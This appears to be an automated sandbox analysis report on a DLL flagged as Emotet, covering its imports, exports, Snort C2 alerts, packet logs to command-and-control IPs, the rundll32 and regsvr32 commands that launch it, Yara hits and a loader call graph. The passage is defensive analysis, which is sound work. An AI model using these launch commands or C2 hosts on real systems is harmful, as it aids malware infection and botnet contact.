                                                                      USER32.dllKillTimer, WindowFromPoint, GetDCEx, LockWindowUpdate, RegisterClipboardFormatA, PostThreadMessageA, SetRect, CharNextA, DestroyIcon, EndPaint, BeginPaint, GetWindowDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, FillRect, LoadCursorA, GetSysColorBrush, SetParent, GetSystemMenu, DeleteMenu, IsRectEmpty, IsZoomed, GetDC, ReleaseDC, LoadMenuA, DestroyMenu, UnpackDDElParam, ReuseDDElParam, ReleaseCapture, LoadAcceleratorsA, InsertMenuItemA, CreatePopupMenu, SetRectEmpty, BringWindowToTop, SetMenu, TranslateAcceleratorA, InvalidateRect, RegisterWindowMessageA, WinHelpA, GetCapture, CreateWindowExA, GetClassLongA, GetClassNameA, SetPropA, GetPropA, RemovePropA, IsChild, GetForegroundWindow, BeginDeferWindowPos, EndDeferWindowPos, GetTopWindow, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, LoadIconA, MapWindowPoints, TrackPopupMenu, SetForegroundWindow, SetTimer, GetClientRect, GetMenu, GetSysColor, AdjustWindowRectEx, ScreenToClient, EqualRect, DeferWindowPos, GetClassInfoA, RegisterClassA, UnregisterClassA, DefWindowProcA, CallWindowProcA, OffsetRect, IntersectRect, SystemParametersInfoA, IsIconic, GetWindowPlacement, GetWindowRect, CopyRect, PtInRect, GetWindow, SetWindowContextHelpId, MapDialogRect, wsprintfA, GetWindowTextLengthA, GetWindowTextA, SetWindowPos, CharUpperA, UpdateWindow, EnableWindow, SendMessageA, GetClassInfoExA, GetSubMenu, GetMenuItemCount, InsertMenuA, GetMenuItemID, AppendMenuA, SetFocus, ShowWindow, MoveWindow, SetWindowLongA, GetDlgCtrlID, SetWindowTextA, IsDialogMessageA, SendDlgItemMessageA, GetMenuItemInfoA, InflateRect, SetMenuItemBitmaps, GetFocus, ModifyMenuA, EnableMenuItem, CheckMenuItem, GetMenuCheckMarkDimensions, LoadBitmapA, SetWindowsHookExA, CallNextHookEx, GetMessageA, TranslateMessage, MessageBeep, GetNextDlgGroupItem, SetCapture, InvalidateRgn, CopyAcceleratorTableA, GetMenuStringA, GetMenuState, EndDialog, GetNextDlgTabItem, GetParent, IsWindowEnabled, GetDlgItem, GetWindowLongA, IsWindow, DestroyWindow, CreateDialogIndirectParamA, GetSystemMetrics, SetActiveWindow, GetActiveWindow, GetDesktopWindow, PostQuitMessage, PostMessageA, SetCursor, ShowOwnedPopups, GetLastActivePopup, MessageBoxA, ValidateRect, GetCursorPos, PeekMessageA, GetKeyState, IsWindowVisible, DispatchMessageA
                                                                      GDI32.dllCreateSolidBrush, CreateFontIndirectA, GetBkColor, GetTextColor, GetStockObject, GetRgnBox, PatBlt, SetRectRgn, CombineRgn, GetMapMode, CreatePatternBrush, ExtSelectClipRgn, ScaleWindowExtEx, SetWindowExtEx, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, Escape, ExtTextOutA, TextOutA, RectVisible, PtVisible, GetPixel, BitBlt, GetWindowExtEx, CreateRectRgnIndirect, GetDeviceCaps, CreateRectRgn, SelectClipRgn, IntersectClipRect, ExcludeClipRect, SetMapMode, SetBkMode, RestoreDC, SaveDC, GetTextExtentPoint32A, GetTextMetricsA, CreateFontA, GetCharWidthA, DeleteObject, SelectObject, StretchDIBits, DeleteDC, CreateCompatibleDC, CreateCompatibleBitmap, GetObjectA, SetBkColor, SetTextColor, GetClipBox, CreateBitmap, GetViewportExtEx
                                                                      comdlg32.dllGetSaveFileNameA, GetFileTitleA, GetOpenFileNameA
                                                                      WINSPOOL.DRVOpenPrinterA, DocumentPropertiesA, ClosePrinter
                                                                      ADVAPI32.dllGetFileSecurityA, RegSetValueA, RegOpenKeyA, RegQueryValueExA, RegOpenKeyExA, RegDeleteKeyA, RegEnumKeyA, RegQueryValueA, RegCreateKeyExA, RegSetValueExA, RegDeleteValueA, RegCreateKeyA, RegCloseKey, SetFileSecurityA
                                                                      SHELL32.dllDragQueryFileA, ExtractIconA, SHGetFileInfoA, DragFinish
                                                                      COMCTL32.dllImageList_Draw, ImageList_GetImageInfo, ImageList_Destroy
                                                                      SHLWAPI.dllPathFindFileNameA, PathStripToRootA, PathFindExtensionA, PathIsUNCA
                                                                      oledlg.dll
                                                                      ole32.dllCreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, CoGetClassObject, CLSIDFromString, CLSIDFromProgID, CoTaskMemFree, OleUninitialize, CoFreeUnusedLibraries, CoRegisterMessageFilter, OleFlushClipboard, OleIsCurrentClipboard, CoRevokeClassObject, CoTaskMemAlloc, OleInitialize
                                                                      OLEAUT32.dllSysAllocStringLen, VariantClear, VariantChangeType, VariantInit, SysStringLen, SysAllocStringByteLen, OleCreateFontIndirect, SystemTimeToVariantTime, SafeArrayDestroy, SysAllocString, VariantCopy, SysFreeString

                                                                      Exports

                                                                      NameOrdinalAddress
                                                                      DllRegisterServer10x10005090
                                                                      DllUnregisterServerr20x100050c0

                                                                      Possible Origin

                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      SpanishMexico

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      192.168.2.5119.193.124.414982270802404304 07/20/22-01:07:10.809694TCP2404304ET CNC Feodo Tracker Reported CnC Server TCP group 3498227080192.168.2.5119.193.124.41
                                                                      192.168.2.551.91.76.894981180802404338 07/20/22-01:07:08.508000TCP2404338ET CNC Feodo Tracker Reported CnC Server TCP group 20498118080192.168.2.551.91.76.89

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jul 20, 2022 01:06:46.936866999 CEST49767443192.168.2.570.36.102.35
                                                                      Jul 20, 2022 01:06:46.936918020 CEST4434976770.36.102.35192.168.2.5
                                                                      Jul 20, 2022 01:06:46.937026024 CEST49767443192.168.2.570.36.102.35
                                                                      Jul 20, 2022 01:06:46.988656998 CEST49767443192.168.2.570.36.102.35
                                                                      Jul 20, 2022 01:06:46.988699913 CEST4434976770.36.102.35192.168.2.5
                                                                      Jul 20, 2022 01:06:47.166369915 CEST4434976770.36.102.35192.168.2.5
                                                                      Jul 20, 2022 01:06:47.175667048 CEST49768443192.168.2.570.36.102.35
                                                                      Jul 20, 2022 01:06:47.175726891 CEST4434976870.36.102.35192.168.2.5
                                                                      Jul 20, 2022 01:06:47.175817966 CEST49768443192.168.2.570.36.102.35
                                                                      Jul 20, 2022 01:06:47.176795959 CEST49768443192.168.2.570.36.102.35
                                                                      Jul 20, 2022 01:06:47.176825047 CEST4434976870.36.102.35192.168.2.5
                                                                      Jul 20, 2022 01:06:47.348900080 CEST4434976870.36.102.35192.168.2.5
                                                                      Jul 20, 2022 01:06:47.356182098 CEST49769443192.168.2.570.36.102.35
                                                                      Jul 20, 2022 01:06:47.356241941 CEST4434976970.36.102.35192.168.2.5
                                                                      Jul 20, 2022 01:06:47.356360912 CEST49769443192.168.2.570.36.102.35
                                                                      Jul 20, 2022 01:06:47.356899023 CEST49769443192.168.2.570.36.102.35
                                                                      Jul 20, 2022 01:06:47.356967926 CEST4434976970.36.102.35192.168.2.5
                                                                      Jul 20, 2022 01:06:47.357043982 CEST49769443192.168.2.570.36.102.35
                                                                      Jul 20, 2022 01:06:47.450864077 CEST497708080192.168.2.592.240.254.110
                                                                      Jul 20, 2022 01:06:50.456844091 CEST497708080192.168.2.592.240.254.110
                                                                      Jul 20, 2022 01:06:56.457360983 CEST497708080192.168.2.592.240.254.110
                                                                      Jul 20, 2022 01:07:08.507999897 CEST498118080192.168.2.551.91.76.89
                                                                      Jul 20, 2022 01:07:08.528073072 CEST80804981151.91.76.89192.168.2.5
                                                                      Jul 20, 2022 01:07:09.036581039 CEST498118080192.168.2.551.91.76.89
                                                                      Jul 20, 2022 01:07:09.056623936 CEST80804981151.91.76.89192.168.2.5
                                                                      Jul 20, 2022 01:07:09.567893982 CEST498118080192.168.2.551.91.76.89
                                                                      Jul 20, 2022 01:07:09.589181900 CEST80804981151.91.76.89192.168.2.5
                                                                      Jul 20, 2022 01:07:09.615654945 CEST498178080192.168.2.5217.182.25.250
                                                                      Jul 20, 2022 01:07:09.643641949 CEST808049817217.182.25.250192.168.2.5
                                                                      Jul 20, 2022 01:07:10.146051884 CEST498178080192.168.2.5217.182.25.250
                                                                      Jul 20, 2022 01:07:10.174648046 CEST808049817217.182.25.250192.168.2.5
                                                                      Jul 20, 2022 01:07:10.771107912 CEST498178080192.168.2.5217.182.25.250
                                                                      Jul 20, 2022 01:07:10.799603939 CEST808049817217.182.25.250192.168.2.5
                                                                      Jul 20, 2022 01:07:10.809694052 CEST498227080192.168.2.5119.193.124.41
                                                                      Jul 20, 2022 01:07:11.079042912 CEST708049822119.193.124.41192.168.2.5
                                                                      Jul 20, 2022 01:07:11.079195976 CEST498227080192.168.2.5119.193.124.41
                                                                      Jul 20, 2022 01:07:11.082602024 CEST498227080192.168.2.5119.193.124.41
                                                                      Jul 20, 2022 01:07:11.353307962 CEST708049822119.193.124.41192.168.2.5
                                                                      Jul 20, 2022 01:07:11.369446039 CEST708049822119.193.124.41192.168.2.5
                                                                      Jul 20, 2022 01:07:11.369509935 CEST708049822119.193.124.41192.168.2.5
                                                                      Jul 20, 2022 01:07:11.369604111 CEST498227080192.168.2.5119.193.124.41
                                                                      Jul 20, 2022 01:07:12.626746893 CEST498227080192.168.2.5119.193.124.41
                                                                      Jul 20, 2022 01:07:12.898112059 CEST708049822119.193.124.41192.168.2.5
                                                                      Jul 20, 2022 01:07:12.898277998 CEST498227080192.168.2.5119.193.124.41
                                                                      Jul 20, 2022 01:07:12.903048992 CEST498227080192.168.2.5119.193.124.41
                                                                      Jul 20, 2022 01:07:13.218106985 CEST708049822119.193.124.41192.168.2.5
                                                                      Jul 20, 2022 01:07:14.065052986 CEST708049822119.193.124.41192.168.2.5
                                                                      Jul 20, 2022 01:07:14.065643072 CEST498227080192.168.2.5119.193.124.41
                                                                      Jul 20, 2022 01:07:17.064517021 CEST708049822119.193.124.41192.168.2.5
                                                                      Jul 20, 2022 01:07:17.064565897 CEST708049822119.193.124.41192.168.2.5
                                                                      Jul 20, 2022 01:07:17.064661980 CEST498227080192.168.2.5119.193.124.41
                                                                      Jul 20, 2022 01:08:36.268321991 CEST498227080192.168.2.5119.193.124.41
                                                                      Jul 20, 2022 01:08:36.268376112 CEST498227080192.168.2.5119.193.124.41

                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:01:06:21
                                                                      Start date:20/07/2022
                                                                      Path:C:\Windows\System32\loaddll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:loaddll32.exe "C:\Users\user\Desktop\9818t9ks1s.dll"
                                                                      Imagebase:0xff0000
                                                                      File size:116736 bytes
                                                                      MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Target ID:1
                                                                      Start time:01:06:22
                                                                      Start date:20/07/2022
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\9818t9ks1s.dll",#1
                                                                      Imagebase:0x1100000
                                                                      File size:232960 bytes
                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Target ID:2
                                                                      Start time:01:06:22
                                                                      Start date:20/07/2022
                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:regsvr32.exe /s C:\Users\user\Desktop\9818t9ks1s.dll
                                                                      Imagebase:0x8f0000
                                                                      File size:20992 bytes
                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.440856153.00000000049E1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.440856153.00000000049E1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.440822056.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.440822056.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high

                                                                      General

                                                                      Target ID:3
                                                                      Start time:01:06:22
                                                                      Start date:20/07/2022
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:rundll32.exe "C:\Users\user\Desktop\9818t9ks1s.dll",#1
                                                                      Imagebase:0xc60000
                                                                      File size:61952 bytes
                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.438019180.00000000049F1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.438019180.00000000049F1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.437810837.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.437810837.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high

                                                                      General

                                                                      Target ID:4
                                                                      Start time:01:06:23
                                                                      Start date:20/07/2022
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\9818t9ks1s.dll,DllRegisterServer
                                                                      Imagebase:0xc60000
                                                                      File size:61952 bytes
                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.438281451.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.438281451.0000000004290000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.438313364.00000000042C1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.438313364.00000000042C1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high

                                                                      General

                                                                      Target ID:5
                                                                      Start time:01:06:26
                                                                      Start date:20/07/2022
                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Bvqee\qeggfkimakwygr.che"
                                                                      Imagebase:0x8f0000
                                                                      File size:20992 bytes
                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.954167693.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.954167693.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.954213063.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.954213063.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high

                                                                      General

                                                                      Target ID:6
                                                                      Start time:01:06:27
                                                                      Start date:20/07/2022
                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\9818t9ks1s.dll,DllUnregisterServerr
                                                                      Imagebase:0xc60000
                                                                      File size:61952 bytes
                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Target ID:12
                                                                      Start time:01:06:47
                                                                      Start date:20/07/2022
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                      Imagebase:0x7ff78ca80000
                                                                      File size:51288 bytes
                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      General

                                                                      Target ID:13
                                                                      Start time:01:06:51
                                                                      Start date:20/07/2022
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                      Imagebase:0x7ff78ca80000
                                                                      File size:51288 bytes
                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      General

                                                                      Target ID:14
                                                                      Start time:01:07:04
                                                                      Start date:20/07/2022
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                      Imagebase:0x7ff78ca80000
                                                                      File size:51288 bytes
                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      General

                                                                      Target ID:16
                                                                      Start time:01:07:10
                                                                      Start date:20/07/2022
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                      Imagebase:0x7ff78ca80000
                                                                      File size:51288 bytes
                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      General

                                                                      Target ID:22
                                                                      Start time:01:07:41
                                                                      Start date:20/07/2022
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                      Imagebase:0x7ff78ca80000
                                                                      File size:51288 bytes
                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      General

                                                                      Target ID:24
                                                                      Start time:01:07:51
                                                                      Start date:20/07/2022
                                                                      Path:C:\Windows\System32\svchost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                      Imagebase:0x7ff78ca80000
                                                                      File size:51288 bytes
                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      Disassembly

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:4%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:3.2%
                                                                        Total number of Nodes:1001
                                                                        Total number of Limit Nodes:22
                                                                        execution_graph 17339 10036c0c 17340 100202ab GetWindowLongA 17339->17340 17341 10036c36 17340->17341 17345 10021d47 17341->17345 17344 10036c77 17346 100373b5 30 API calls 17345->17346 17347 10021d52 ___initmbctable 17346->17347 17348 100373b5 30 API calls 17347->17348 17387 10021d5f SetRectEmpty 17347->17387 17349 10021d8a 17348->17349 17350 10021dbb 17349->17350 17388 10020b9b 17349->17388 17352 10021dda 17350->17352 17354 10020b9b 39 API calls 17350->17354 17353 10021e01 17352->17353 17355 10020b9b 39 API calls 17352->17355 17356 10021e27 17353->17356 17405 10021d06 17353->17405 17354->17352 17355->17353 17358 10021e54 17356->17358 17360 10021d06 41 API calls 17356->17360 17359 10021e75 17358->17359 17412 1002155e GetModuleHandleA LoadLibraryA 17358->17412 17362 10021e95 17359->17362 17363 1002155e 6 API calls 17359->17363 17360->17358 17364 10021eb2 17362->17364 17365 1002155e 6 API calls 17362->17365 17363->17362 17366 10021ecb 17364->17366 17368 1002155e 6 API calls 17364->17368 17365->17364 17367 10021ee8 17366->17367 17369 1002155e 6 API calls 17366->17369 17370 10021f05 17367->17370 17371 1002155e 6 API calls 17367->17371 17368->17366 17369->17367 17372 10021f22 17370->17372 17373 1002155e 6 API calls 17370->17373 17371->17370 17374 10021f3f 17372->17374 17376 1002155e 6 API calls 17372->17376 17373->17372 17375 10021f5c 17374->17375 17377 1002155e 6 API calls 17374->17377 17378 10021f75 17375->17378 17379 1002155e 6 API calls 17375->17379 17376->17374 17377->17375 17380 10021f8e 17378->17380 17381 1002155e 6 API calls 17378->17381 17379->17378 17382 10021fab 17380->17382 17384 1002155e 6 API calls 17380->17384 17381->17380 17383 10021fc8 17382->17383 17385 1002155e 6 API calls 17382->17385 17386 1002155e 6 API calls 17383->17386 17383->17387 17384->17382 17385->17383 17386->17387 17387->17344 17420 10011bf0 17388->17420 17390 10020ba5 GetClassInfoA 17391 10020bc5 17390->17391 17392 10020bcd RegisterClassA 17390->17392 17391->17350 17392->17391 17393 10020bd9 17392->17393 17394 100373b5 30 API calls 17393->17394 17395 10020be4 17394->17395 17395->17391 17396 10037a1b 5 API calls 17395->17396 17397 10020bf4 17396->17397 17398 100373b5 30 API calls 17397->17398 17399 10020bfd lstrlenA lstrlenA 17398->17399 17399->17391 17400 10020c24 lstrlenA lstrlenA 17399->17400 17401 10020c3c lstrcatA lstrcatA 17400->17401 17402 10020c5d UnregisterClassA 17400->17402 17403 10020c6d 17401->17403 17402->17403 17421 10037a7e LeaveCriticalSection 17403->17421 17406 100373b5 30 API calls 17405->17406 17407 10021d18 LoadIconA 17406->17407 17408 10021d31 LoadIconA 17407->17408 17409 10021d3c 17407->17409 17408->17409 17410 10020b9b 39 API calls 17409->17410 17411 10021d42 17410->17411 17411->17356 17413 100215d0 17412->17413 17414 1002157c GetProcAddress 17412->17414 17413->17359 17415 100215a9 17414->17415 17416 1002158e 17414->17416 17417 100215c7 FreeLibrary 17415->17417 17419 100215bb #17 17415->17419 17416->17417 17418 1002159f #17 17416->17418 17417->17413 17418->17417 17419->17417 17420->17390 17421->17391 15849 10005090 15850 100050a0 15849->15850 15851 10005099 ExitProcess 15849->15851 15854 10004780 15850->15854 15855 1000495d 15854->15855 15856 10004869 15854->15856 15856->15855 15857 10004c84 bsearch 15856->15857 15858 100049ec malloc 15856->15858 15857->15855 15858->15855 15859 10004b0b qsort 15858->15859 15859->15857 16128 1001131c 16130 10011328 ___free_lc_time 16128->16130 16129 10011379 16137 100113b6 ___free_lc_time 16129->16137 16186 10006120 16129->16186 16130->16129 16130->16137 16138 1001119b 16130->16138 16133 1001138d 16134 100113a3 16133->16134 16135 1001119b 107 API calls 16133->16135 16136 1001119b 107 API calls 16134->16136 16134->16137 16135->16134 16136->16137 16139 1001128b 16138->16139 16140 100111ab __lock 16138->16140 16141 100112bb 16139->16141 16142 1001128f 16139->16142 16145 100111b5 GetVersionExA 16140->16145 16143 100112c0 16141->16143 16144 10011304 16141->16144 16147 100112aa 16142->16147 16156 100112b9 16142->16156 16212 10011f67 16142->16212 16148 1001382a __lock 36 API calls 16143->16148 16144->16156 16308 10015355 16144->16308 16146 100111cc 16145->16146 16145->16156 16204 10013a83 HeapCreate 16146->16204 16215 1001634a 16147->16215 16149 100112cc 16148->16149 16153 100112d4 FlsSetValue 16149->16153 16149->16156 16157 100112e6 16153->16157 16158 100112fa 16153->16158 16156->16129 16164 100112eb GetCurrentThreadId 16157->16164 16162 100107c8 ___free_lc_time 36 API calls 16158->16162 16159 10011217 16159->16156 16161 10011220 16159->16161 16223 10015384 16161->16223 16162->16156 16163 100112b4 16166 10013ad4 VirtualFree VirtualFree HeapFree HeapFree HeapDestroy 16163->16166 16164->16156 16166->16156 16168 10011225 16170 10011238 GetCommandLineA 16168->16170 16178 10011229 16168->16178 16169 1001122e 16169->16156 16247 1001666b 16170->16247 16175 10011284 16177 1001516d FlsFree 16175->16177 16177->16178 16241 10013ad4 16178->16241 16179 1001125b 16180 1001126f 16179->16180 16292 10016396 16179->16292 16182 1001634a 37 API calls 16180->16182 16185 10011274 16180->16185 16182->16175 16185->16156 16187 10006566 16186->16187 16188 1000612c 16186->16188 16187->16133 16738 10005040 16188->16738 16190 10006131 16191 1000656f 16190->16191 16194 10006139 16190->16194 16764 10011135 16191->16764 16193 10006579 16193->16133 16195 1000634f FindResourceW LoadResource SizeofResource 16194->16195 16196 10006432 VirtualAlloc 16195->16196 16197 1000638c VirtualAllocExNuma 16195->16197 16198 100064d0 memcpy malloc 16196->16198 16197->16198 16761 10002340 malloc 16198->16761 16200 10006508 16201 1000651f ??3@YAXPAX 16200->16201 16744 10005260 16201->16744 16203 1000654b 16203->16187 16205 10013aa3 16204->16205 16206 10013acd 16204->16206 16207 10013ad0 16205->16207 16208 10013ab2 16205->16208 16206->16159 16207->16159 16315 10013b53 HeapAlloc 16208->16315 16211 10013ac1 HeapDestroy 16211->16206 16317 10011e93 16212->16317 16214 10011f72 16214->16147 16216 10016351 16215->16216 16217 100112af 16216->16217 16218 10016365 DeleteCriticalSection 16216->16218 16219 100107c8 ___free_lc_time 36 API calls 16216->16219 16220 1001516d 16217->16220 16218->16216 16219->16216 16221 10015185 16220->16221 16222 10015177 FlsFree 16220->16222 16221->16221 16222->16221 16338 100138e5 16223->16338 16226 10015395 GetModuleHandleA 16229 10015413 FlsAlloc 16226->16229 16230 100153a8 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 16226->16230 16227 1001538d 16228 1001516d FlsFree 16227->16228 16234 10015392 16228->16234 16232 10015469 16229->16232 16233 10015428 16229->16233 16230->16229 16231 100153eb 16230->16231 16231->16229 16236 1001516d FlsFree 16232->16236 16235 1001382a __lock 36 API calls 16233->16235 16234->16168 16237 10015436 16235->16237 16238 1001546e 16236->16238 16237->16232 16239 1001543e FlsSetValue 16237->16239 16238->16168 16239->16232 16240 1001544f GetCurrentThreadId 16239->16240 16240->16238 16242 10013b46 HeapDestroy 16241->16242 16243 10013add 16241->16243 16242->16169 16244 10013b34 HeapFree 16243->16244 16245 10013b00 VirtualFree VirtualFree HeapFree 16243->16245 16244->16242 16245->16245 16246 10013b32 16245->16246 16246->16244 16248 100166a6 16247->16248 16249 10016687 GetEnvironmentStringsW 16247->16249 16251 1001668f 16248->16251 16252 10016736 16248->16252 16250 1001669b GetLastError 16249->16250 16249->16251 16250->16248 16254 100166c5 WideCharToMultiByte 16251->16254 16255 100166bd GetEnvironmentStringsW 16251->16255 16253 10016742 GetEnvironmentStrings 16252->16253 16256 10011248 16252->16256 16253->16256 16257 1001674e 16253->16257 16259 100166f9 16254->16259 16260 1001672b FreeEnvironmentStringsW 16254->16260 16255->16254 16255->16256 16270 1001614c 16256->16270 16261 100107b6 __getbuf 36 API calls 16257->16261 16262 100107b6 __getbuf 36 API calls 16259->16262 16260->16256 16269 10016767 16261->16269 16263 100166ff 16262->16263 16263->16260 16264 10016708 WideCharToMultiByte 16263->16264 16266 10016722 16264->16266 16267 10016719 16264->16267 16265 1001677d FreeEnvironmentStringsA 16265->16256 16266->16260 16268 100107c8 ___free_lc_time 36 API calls 16267->16268 16268->16266 16269->16265 16271 100107b6 __getbuf 36 API calls 16270->16271 16273 1001615b 16271->16273 16272 100161a1 GetStartupInfoA 16282 100161bb 16272->16282 16284 100162a4 16272->16284 16273->16272 16283 10011252 16273->16283 16274 10016334 SetHandleCount 16274->16283 16275 100162d3 GetStdHandle 16277 100162e1 GetFileType 16275->16277 16275->16284 16276 100107b6 __getbuf 36 API calls 16276->16282 16277->16284 16278 10016252 GetFileType 16280 1001622c 16278->16280 16279 10019599 __lock 2 API calls 16279->16280 16280->16278 16280->16279 16280->16283 16280->16284 16281 10019599 __lock 2 API calls 16281->16284 16282->16276 16282->16280 16282->16284 16283->16175 16285 